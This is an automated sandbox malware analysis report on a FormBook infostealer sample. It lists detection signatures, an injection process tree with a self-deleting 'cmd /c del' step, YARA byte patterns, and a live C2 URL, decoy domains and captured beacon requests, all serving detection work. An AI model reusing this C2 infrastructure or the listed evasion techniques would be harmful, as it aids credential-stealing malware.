Loading ...

Play interactive tourEdit tour

Windows Analysis Report JFBlvEr5H9

Overview

General Information

Sample Name:JFBlvEr5H9 (renamed file extension from none to exe)
Analysis ID:458762
MD5:214b1ddf045e4d6fdd73a5c8788d2adc
SHA1:8bb7c462fb649d16edb98ab526df8475a329cc71
SHA256:d8e25ce44c46057985a0467adcf4fc12d8beac599e3031f6674fd1e01988267e
Tags:32exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • JFBlvEr5H9.exe (PID: 2036 cmdline: 'C:\Users\user\Desktop\JFBlvEr5H9.exe' MD5: 214B1DDF045E4D6FDD73A5C8788D2ADC)
    • JFBlvEr5H9.exe (PID: 1760 cmdline: C:\Users\user\Desktop\JFBlvEr5H9.exe MD5: 214B1DDF045E4D6FDD73A5C8788D2ADC)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
      • mstsc.exe (PID: 6868 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
        • cmd.exe (PID: 7048 cmdline: /c del 'C:\Users\user\Desktop\JFBlvEr5H9.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 7104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166a9:$sqlite3step: 68 34 1C 7B E1
    • 0x167bc:$sqlite3step: 68 34 1C 7B E1
    • 0x166d8:$sqlite3text: 68 38 2A 90 C5
    • 0x167fd:$sqlite3text: 68 38 2A 90 C5
    • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
    00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 18 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.JFBlvEr5H9.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.JFBlvEr5H9.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.JFBlvEr5H9.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166a9:$sqlite3step: 68 34 1C 7B E1
        • 0x167bc:$sqlite3step: 68 34 1C 7B E1
        • 0x166d8:$sqlite3text: 68 38 2A 90 C5
        • 0x167fd:$sqlite3text: 68 38 2A 90 C5
        • 0x166eb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16813:$sqlite3blob: 68 53 D8 7F 8C
        4.2.JFBlvEr5H9.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.JFBlvEr5H9.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.anewdistraction.com/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFfAvira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: JFBlvEr5H9.exeVirustotal: Detection: 20%Perma Link
          Source: JFBlvEr5H9.exeReversingLabs: Detection: 21%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.355743155.0000000001530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.500868398.0000000000B40000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.354554350.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.355839034.0000000001560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.500576631.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000015.00000002.499504854.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.260942195.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
          Machine Learning detection for sampleShow sources
          Source: JFBlvEr5H9.exeJoe Sandbox ML: detected
          Source: 4.2.JFBlvEr5H9.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: JFBlvEr5H9.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: JFBlvEr5H9.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe, 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: JFBlvEr5H9.exe, 00000004.00000002.356142962.0000000001620000.00000040.00000001.sdmp, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: JFBlvEr5H9.exe, 00000004.00000002.357368484.0000000003660000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.295246596.000000000EC20000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_01082130
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_01082121
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_01083B22
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_01083B30
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4x nop then pop edi4_2_00416282
          Source: C:\Users\user\Desktop\JFBlvEr5H9.exeCode function: 4x nop then pop ebx4_2_00406A94
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi21_2_00706282
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop ebx21_2_006F6A95

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 52.20.84.62:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 52.20.84.62:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49751 -> 52.20.84.62:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.adultpeace.com/p2io/
          Source: global trafficHTTP traffic detected: GET /p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8 HTTP/1.1Host: www.aideliveryrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf HTTP/1.1Host: www.anewdistraction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.20.84.62 52.20.84.62
          Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
          Source: global trafficHTTP traffic detected: GET /p2io/?4hUd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJCbeCHS0svVQ&l8Wd=tZ-TMtLxEfs8 HTTP/1.1Host: www.aideliveryrobot.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=ia0dgIkdnBZILDuo3zp8eo0tNiPxoXJfkPpt6P05AAGh3ZPzSagLTNX+xAQ6XfPC4pFf HTTP/1.1Host: www.anewdistraction.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.pyithuhluttaw.net
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 03 Aug 2021 16:14:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeData Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0
          Source: JFBlvEr5H9.exe, 00000000.00000003.238128917.0000000005916000.00000004.00000001.sdmpString found in binary or memory: http://en.w
          Source: JFBlvEr5H9.exe, 00000000.00000003.237660704.0000000005933000.00000004.00000001.sdmpString found in binary or memory: http://en.wikipedia
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: JFBlvEr5H9.exe, 00000000.00000003.240494408.0000000005917000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.html
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com2
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comW.TTF
          Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.coma
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comalic
          Source: JFBlvEr5H9.exe, 00000000.00000003.245948379.000000000591E000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comals
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comd
          Source: JFBlvEr5H9.exe, 00000000.00000003.245343058.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comda
          Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comion
          Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comm
          Source: JFBlvEr5H9.exe, 00000000.00000003.246881915.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comn
          Source: JFBlvEr5H9.exe, 00000000.00000003.245771787.000000000591C000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comsivd
          Source: JFBlvEr5H9.exe, 00000000.00000003.250564170.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comue
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000003.239881394.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: JFBlvEr5H9.exe, 00000000.00000003.239956234.0000000005918000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn3
          Source: JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnX
          Source: JFBlvEr5H9.exe, 00000000.00000003.239956234.0000000005918000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnicr
          Source: JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnl-nX
          Source: JFBlvEr5H9.exe, 00000000.00000003.240011521.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cns-m
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/)
          Source: JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/4
          Source: JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/B
          Source: JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: JFBlvEr5H9.exe, 00000000.00000003.240873600.000000000591B000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/s/0
          Source: JFBlvEr5H9.exe, 00000000.00000003.241808255.000000000591D000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/w
          Source: mstsc.exe, 00000015.00000002.500275639.0000000000957000.00000004.00000020.sdmpString found in binary or memory: http://www.pyithuhluttaw.net/p2io/?l8Wd=tZ-TMtLxEfs8&4hUd=NEaCbUvtdfVyj3ONmrIJ7dR/yfSp7Xbba33MRCbi01
          Source: JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmp, JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com2
          Source: JFBlvEr5H9.exe, 00000000.00000003.237995226.000000000592B000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.come
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: JFBlvEr5H9.exe, 00000000.00000002.274340140.0000000006C12000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.293483033.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.2.JFBlvEr5H9.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.JFBlvEr5H9.exe.400000.0.unpack, type: UNPACKEDPE
